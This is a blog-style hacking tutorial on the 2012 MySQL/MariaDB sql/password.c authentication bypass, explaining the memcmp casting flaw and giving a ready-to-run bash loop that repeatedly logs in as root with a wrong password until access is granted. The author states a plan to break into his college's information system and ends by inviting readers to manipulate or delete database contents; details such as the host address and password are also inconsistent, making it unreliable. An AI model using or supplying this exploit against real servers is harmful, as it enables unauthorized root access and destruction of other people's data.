EXPLOITING MYSQL/MARIADB SQL/PASSWORD.C VULNERABILITY TO GAIN ACCESS INTO MYSQL SERVER

Hey guys, today I thought to talk about a vulnerability which is found on MySQL and MariaDB databases. I have surfed and went through a lot of written stuff to get a proper understanding about this vulnerability. Actually I was completely unaware of this stuff! I came knew about this when I  just scanned my college’s Online Information System (OIS) and I got an alert saying “MySQL/MariaDB sql/password.c is vulnerable”. When I researched over this topic, I have come up with a notion to hack into my college’s information systems. Well, I will let you guys know once I successfully perform that, but right now I’m on a vacation so I’ll give a try when I move back.

This vulnerability was found and reported on 9th of June’12. This was reported bySergei Golubchik a Security Co-ordinator. You can take a complete look over the report by following the link. http://seclists.org/oss-sec/2012/q2/493.

The versions of MariaDB and MySQL, 5.1.61, 5.2.11, 5.3.5, 5.5.22 are found to be vulnerable.

According to Mr. Golubchik, the MySQL server give a root access to an attacker without a proper authentication. When an attacker connects to a MySQL server, he is asked for the username and password, where “root” is the username that exits by default. The password given as input is sent through the memcmp() function which compares the input string with the existing string. But it is observed that when the attacker tries to access the server remotely, giving nearly 300 attempts, the function’s non-zero value is misinterpreted due to the incorrect casting. Hence the attacker gains a complete access to the root user of MySQL server exploiting the MySQL/MariaDB sql/password.c bug.

How to exploit this bug?

So here comes the hacking part! Hope that your concept is clear, after reading the above explanation, now let’s move on to exploiting the bug. Follow the instructions below to perform the attack, that is to take the access over the MySQL server.

Open your bash or shell and type the following command:

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

Let us explore the command a little bit. Here we apply a for loop with a sequence of 1000 to run a command “ mysql -u root –password=bad -h 172.0.20.1″. Let’s have an even closer look, the -u parameter defines that root is the username and finally the password parameter is equated to the word hack.

After you run this command, wait for this server to display the following message:

Welcome to MySQL monitor. Command end with ; or \g.

Your MySQL connection id is 2313

Server version: 5.3.5-0ubuntu1 (Ubuntu)

Copyright (c) 2012, 2013

That’s it you have an access to the MySQL database of the server. Now you can execute the SQL commands to manipulate or delete the database content!

Have a wonderful time… Feel free to comment!